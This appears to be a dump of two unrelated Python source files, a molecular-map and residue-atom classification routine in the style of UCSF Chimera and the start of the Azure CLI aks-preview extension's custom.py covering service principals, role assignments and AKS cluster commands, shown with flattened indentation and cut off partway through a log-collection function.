nmat = numpy.zeros ( (nn1,nn2,nn3), numpy.float32 )
ndata = VolumeData.Array_Grid_Data ( nmat, nO, nstep, dmap.data.cell_angles )
npoints = grid_indices ( (nn1, nn2, nn3), numpy.single) # i,j,k indices
transform_vertices ( npoints, ndata.ijk_to_xyz_transform )
dvals = dmap.interpolated_values ( npoints, dmap.openState.xform )
#dvals = numpy.where ( dvals > threshold, dvals, numpy.zeros_like(dvals) )
#nze = numpy.nonzero ( dvals )
nmat = dvals.reshape( (nn3,nn2,nn1) )
ndata = VolumeData.Array_Grid_Data ( nmat, nO, nstep, dmap.data.cell_angles )
if fout == None :
try : nv = VolumeViewer.volume.add_data_set ( ndata, None )
except : nv = VolumeViewer.volume.volume_from_grid_data ( ndata )
dmap_base = os.path.splitext(dmap.name)[0]
dmap_path = os.path.splitext (dmap.data.path)[0]
nv.name = dmap_base + "_masked"
nv.openState.xform = dmap.openState.xform
return nv
else :
from VolumeData import save_grid_data
#d = self.grid_data()
format = save_grid_data(ndata, fout, None, {}, False)
#print " - saved data"
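# Note: with its "if 0" branch disabled, MaskMapResize above effectively crops rather than
# masks: it converts the atom coordinates to grid (ijk) space, takes their bounding box plus
# a 6-voxel pad, snaps the new origin onto the original grid (round(nO/step)*step), and
# resamples the map onto that box by interpolation, either opening the result as a new
# "<map>_masked" volume or saving it to `fout`.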
def SetBBAts ( mol ) :
#if hasattr ( mol, "bbats" ) :
# return
#mol.bbats = True
#print " - setting bbAts in %s" % mol.name
for r in mol.residues :
#r.isProt = "C" in r.atomsMap and "CA" in r.atomsMap and "N" in r.atomsMap
#r.isProt = "CA" in r.atomsMap
#r.isNA = "O3'" in r.atomsMap and "O5'" in r.atomsMap
from chimera.resCode import nucleic3to1
from chimera.resCode import protein3to1
protein3to1['HSD'] = protein3to1['HIS']
protein3to1['HSE'] = protein3to1['HIS']
r.isProt = r.type in protein3to1
r.isNA = r.type in nucleic3to1
r.score1 = None
r.score2 = None
if r.isProt :
r.rtype = "prot"
elif r.isNA :
r.rtype = "na"
else :
r.rtype = "?"
if r.isNA :
try :
if nucleic3to1[r.type] == "G" :
r.baseAt = r.atomsMap["N9"][0]
elif nucleic3to1[r.type] == "C" :
r.baseAt = r.atomsMap["N1"][0]
elif nucleic3to1[r.type] == "A" :
r.baseAt = r.atomsMap["N9"][0]
elif nucleic3to1[r.type] == "U" :
r.baseAt = r.atomsMap["N1"][0]
except :
#print " - baseAt not found - "
pass
r.bbAtoms = []
r.scAtoms = []
if r.isProt :
for a in r.atoms :
if a.element.name == "H" :
a.isBB, a.isSC = False, False
continue
n = a.name
a.isBB = n=="C" or n=="CA" or n=="O" or n=="N" or n=="OT1" or n=="OT2"
a.isSC = not a.isBB
if a.isBB :
r.bbAtoms.append ( a )
else :
r.scAtoms.append ( a )
a.isSugar, a.isBase = False, False
elif r.isNA :
for a in r.atoms :
if a.element.name == "H" :
a.isBB, a.isSC = False, False
continue
n = a.name
a.isBB = n=="P" or n=="O1P" or n=="O2P" or n=="OP1" or n=="OP2" or n=="O5'" or n=="C5'" or n=="O3'"
a.isSugar = n=="C1'" or n=="C2'" or n=="O4'" or n=="O2'" or n=="C3'" or n=="C4'"
a.isBB = a.isBB or a.isSugar
a.isBase = not a.isBB
if nucleic3to1[r.type] == "G" :
a.isBase = n=="N9" or n=="C8" or n=="N7" or n=="C5" or n=="C4" or n=="C6" or n=="O6" or n=="N1" or n=="C2" or n=="N2" or n=="N3"
elif nucleic3to1[r.type] == "C" :
a.isBase = n=="N1" or n=="C2" or n=="O2" or n=="N3" or n=="C4" or n=="N4" or n=="C5" or n=="C6"
elif nucleic3to1[r.type] == "A" :
a.isBase = n=="N9" or n=="C8" or n=="N7" or n=="C5" or n=="C4" or n=="N3" or n=="C2" or n=="N1" or n=="C6" or n=="N6"
elif nucleic3to1[r.type] == "U" :
a.isBase = n=="N1" or n=="C2" or n=="O2" or n=="N3" or n=="C4" or n=="O4" or n=="C5" or n=="C6"
else :
#print " -x- NA res %d.%s is ?" % (r.id.position, r.type)
break
a.isSC = a.isBase
#if nucleic3to1[r.type] == "G" :
# r.isBase = n=="" or n=="" or n=="" or n=="" or n=="" or n=="" or n=="" or n=="" or n="" or n="" or n=""
# r.baseAt = r.atomsMap["N9"][0]
if a.isBB :
r.bbAtoms.append ( a )
else :
r.scAtoms.append ( a )
else :
for a in r.atoms :
a.isBB, a.isSC, a.isSugar, a.isBase = False, False, False, False
|
custom.py
|
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import base64
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from math import isnan
import colorama # pylint: disable=import-error
import yaml # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (
ArgumentUsageError,
InvalidArgumentValueError,
)
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.commands.client_factory import (
get_mgmt_service_client,
get_subscription_id,
)
from azure.cli.core.util import (
get_file_json,
in_cloud_console,
sdk_no_wait,
shell_safe_json_parse,
)
from azure.graphrbac.models import (
ApplicationCreateParameters,
KeyCredential,
PasswordCredential,
ServicePrincipalCreateParameters,
)
from dateutil.parser import parse # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from knack.log import get_logger
from knack.prompting import NoTTYException, prompt_pass
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
from six.moves.urllib.error import URLError # pylint: disable=import-error
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azext_aks_preview._client_factory import CUSTOM_MGMT_AKS_PREVIEW
from ._client_factory import (
cf_agent_pools,
cf_container_registry_service,
cf_snapshots_client,
cf_storage,
get_auth_management_client,
get_graph_rbac_management_client,
get_msi_client,
get_resource_by_name,
)
from ._consts import (
ADDONS,
ADDONS_DESCRIPTIONS,
CONST_ACC_SGX_QUOTE_HELPER_ENABLED,
CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME,
CONST_AZURE_POLICY_ADDON_NAME,
CONST_CONFCOM_ADDON_NAME,
CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME,
CONST_INGRESS_APPGW_ADDON_NAME,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME,
CONST_INGRESS_APPGW_SUBNET_CIDR,
CONST_INGRESS_APPGW_SUBNET_ID,
CONST_INGRESS_APPGW_WATCH_NAMESPACE,
CONST_KUBE_DASHBOARD_ADDON_NAME,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID,
CONST_MONITORING_ADDON_NAME,
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID,
CONST_MONITORING_USING_AAD_MSI_AUTH,
CONST_OPEN_SERVICE_MESH_ADDON_NAME,
CONST_ROTATION_POLL_INTERVAL,
CONST_SCALE_DOWN_MODE_DELETE,
CONST_SCALE_SET_PRIORITY_REGULAR,
CONST_SCALE_SET_PRIORITY_SPOT,
CONST_SECRET_ROTATION_ENABLED,
CONST_SPOT_EVICTION_POLICY_DELETE,
CONST_VIRTUAL_NODE_ADDON_NAME,
CONST_VIRTUAL_NODE_SUBNET_NAME,
)
from ._helpers import (
_trim_fqdn_name_containing_hcp,
)
from ._podidentity import (
_ensure_managed_identity_operator_permission,
_ensure_pod_identity_addon_is_enabled,
_fill_defaults_for_pod_identity_profile,
_update_addon_pod_identity,
)
from ._resourcegroup import get_rg_location
from ._roleassignments import (
add_role_assignment,
build_role_scope,
create_role_assignment,
resolve_object_id,
resolve_role_id,
)
from .addonconfiguration import (
add_ingress_appgw_addon_role_assignment,
add_monitoring_role_assignment,
add_virtual_node_role_assignment,
enable_addons,
ensure_container_insights_for_monitoring,
ensure_default_log_analytics_workspace_for_monitoring,
sanitize_loganalytics_ws_resource_id,
)
from .maintenanceconfiguration import (
aks_maintenanceconfiguration_update_internal,
)
from .vendored_sdks.azure_mgmt_preview_aks.v2021_11_01_preview.models import (
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
CreationData,
KubeletConfig,
LinuxOSConfig,
ManagedClusterAddonProfile,
ManagedClusterHTTPProxyConfig,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
PowerState,
Snapshot,
SysctlConfig,
UserAssignedIdentity,
)
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
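# Note: on Python 3 the standard library offers a similar lookup via shutil.which, e.g.:
#
#   import shutil
#   kubectl_path = shutil.which('kubectl')  # full path to the executable, or None if not found
#
# shutil.which also honors PATHEXT on Windows, so its results can differ slightly from the
# helper above.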
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
    t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
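# Illustrative example (values are made up): for name 'My_Cluster', resource group 'my-rg'
# and subscription id '0123456789abcdef', _get_default_dns_prefix returns
# 'MyCluster-my-rg-012345'; a name starting with a non-alphabetic character gets an 'a' prepended.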
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
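# Note: the acsServicePrincipal.json file read and written by the helpers above maps
# subscription ids to stored credentials, e.g. (illustrative values):
#
#   {
#       "00000000-0000-0000-0000-000000000000": {
#           "client_secret": "<secret>",
#           "service_principal": "<app id>"
#       }
#   }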
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
_re_user_assigned_identity_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
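# Note: the pattern above matches (case-insensitively) resource ids of the form
#   /subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/
#       Microsoft.ManagedIdentity/userAssignedIdentities/<identity-name>
# and captures the subscription id, resource group name and identity name.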
def _get_user_assigned_identity(cli_ctx, resource_id):
resource_id = resource_id.lower()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
identity_name = match.group(3)
msi_client = get_msi_client(cli_ctx, subscription_id)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("Identity {} not found.".format(resource_id))
raise CLIError(ex.message)
return identity
raise CLIError(
"Cannot parse identity name from provided resource id {}.".format(resource_id))
_re_snapshot_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.containerservice/snapshots/(.*)',
flags=re.IGNORECASE)
def _get_snapshot(cli_ctx, snapshot_id):
snapshot_id = snapshot_id.lower()
match = _re_snapshot_resource_id.search(snapshot_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
snapshot_name = match.group(3)
snapshot_client = cf_snapshots_client(cli_ctx, subscription_id=subscription_id)
try:
snapshot = snapshot_client.get(resource_group_name, snapshot_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise InvalidArgumentValueError("Snapshot {} not found.".format(snapshot_id))
raise CLIError(ex.message)
return snapshot
raise InvalidArgumentValueError(
"Cannot parse snapshot name from provided resource id {}.".format(snapshot_id))
def aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
):
from azure.cli.command_modules.acs.custom import _aks_browse
return _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser,
listen_address,
listen_port,
CUSTOM_MGMT_AKS_PREVIEW,
)
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def aks_maintenanceconfiguration_list(
cmd,
client,
resource_group_name,
cluster_name
):
return client.list_by_managed_cluster(resource_group_name, cluster_name)
def aks_maintenanceconfiguration_show(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.get(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_delete(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.delete(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_add(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
for config in configs:
if config.name == config_name:
raise CLIError("Maintenance configuration '{}' already exists, please try a different name, "
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_maintenanceconfiguration_update(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
found = False
for config in configs:
if config.name == config_name:
found = True
break
if not found:
raise CLIError("Maintenance configuration '{}' doesn't exist."
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
# pylint: disable=unused-argument,too-many-locals
def aks_create(cmd,
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
os_sku=None,
enable_fips_image=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
pod_cidrs=None,
service_cidrs=None,
ip_families=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_managed_outbound_ipv6_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
min_count=None,
max_count=None,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
private_dns_zone=None,
enable_managed_identity=True,
fqdn_subdomain=None,
disable_public_fqdn=False,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
enable_sgxquotehelper=False,
kubelet_config=None,
linux_os_config=None,
http_proxy_config=None,
assign_identity=None,
auto_upgrade_channel=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
edge_zone=None,
enable_secret_rotation=False,
rotation_poll_interval=None,
disable_local_accounts=False,
no_wait=False,
assign_kubelet_identity=None,
workload_runtime=None,
gpu_instance_profile=None,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
snapshot_id=None,
enable_oidc_issuer=False,
yes=False):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
from azure.cli.command_modules.acs.decorator import AKSParamDict
from .decorator import AKSPreviewCreateDecorator
# decorator pattern
aks_create_decorator = AKSPreviewCreateDecorator(
cmd=cmd,
client=client,
raw_parameters=AKSParamDict(raw_parameters),
resource_type=CUSTOM_MGMT_AKS_PREVIEW,
)
try:
# construct mc profile
mc = aks_create_decorator.construct_mc_preview_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to create a real managed cluster
return aks_create_decorator.create_mc_preview(mc)
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_managed_outbound_ipv6_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
uptime_sla=False,
no_uptime_sla=False,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
aks_custom_headers=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
disable_pod_identity=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
disable_local_accounts=False,
enable_local_accounts=False,
enable_public_fqdn=False,
disable_public_fqdn=False,
yes=False,
tags=None,
nodepool_labels=None,
windows_admin_password=None,
enable_azure_rbac=False,
disable_azure_rbac=False,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
enable_oidc_issuer=False):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
from azure.cli.command_modules.acs.decorator import AKSParamDict
from .decorator import AKSPreviewUpdateDecorator
# decorator pattern
aks_update_decorator = AKSPreviewUpdateDecorator(
cmd=cmd,
client=client,
raw_parameters=AKSParamDict(raw_parameters),
resource_type=CUSTOM_MGMT_AKS_PREVIEW,
)
try:
# update mc profile
mc = aks_update_decorator.update_mc_preview_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to update the real managed cluster
return aks_update_decorator.update_mc_preview(mc)
# pylint: disable=unused-argument
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
    This works around a quirk of the Python SDK's behavior: these fields are not sent
    by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None,
public_fqdn=False):
credentialResults = None
serverType = None
if public_fqdn:
serverType = 'public'
if admin:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name, serverType)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name, serverType)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(
resource_group_name, name, serverType)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(
cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError(
"A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import (is_valid_resource_id, parse_resource_id,
resource_id)
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
